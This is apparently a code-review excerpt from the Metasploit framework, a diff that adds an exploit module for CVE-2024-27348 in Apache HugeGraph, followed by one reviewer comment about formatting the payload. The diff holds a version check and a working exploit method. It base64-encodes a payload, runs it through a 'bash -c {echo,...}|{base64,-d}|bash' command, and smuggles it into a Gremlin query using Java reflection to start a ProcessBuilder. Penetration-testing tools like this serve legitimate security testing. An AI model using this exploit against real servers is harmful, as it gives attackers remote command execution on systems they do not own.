modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb

```diff
@@ -0,0 +1,101 @@
+        'References' => [
+          [ 'URL', 'https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/'],
+          [ 'CVE', '2024-27348']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux],
+        'Privileged' => true,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-04-22',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Base path to the Apache HugeGraph web application', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET'
+    })
+
+    return CheckCode::Unknown('No response from the vulnerable endpoint /gremlin') unless res
+    return CheckCode::Unknown("The response from the vulnerable endpoint /gremlin was: #{res.code} (expected: 200)") unless res.code == 200
+
+    version = res.get_json_document&.dig('version')
+    return CheckCode::Unknown('Unable able to determine the version of Apache HugeGraph') unless version
+
+    if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
+      CheckCode::Appears("Apache HugeGraph version detected: #{version}")
+    else
+      CheckCode::Safe("Apache HugeGraph version detected: #{version}")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Running exploit with payload: #{datastore['PAYLOAD']}")
+
+    cmd = "bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|bash"
+    commands_array = cmd.strip.split(' ')
+
+    class_name = rand_text_alpha(4..12)
+    thread_name = rand_text_alpha(4..12)
+    command_name = rand_text_alpha(4..12)
+    process_builder_name = rand_text_alpha(4..12)
+    start_method_name = rand_text_alpha(4..12)
+    constructor_name = rand_text_alpha(4..12)
+    field_name = rand_text_alpha(4..12)
+
+    formatted_command = commands_array.map { |element| "\"#{element}\"" }.join(', ')
+    data = {
+      'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
```

Comment:
I think it would be nice to have the payload properly formatted, then `join`'ed in a single line before sending it.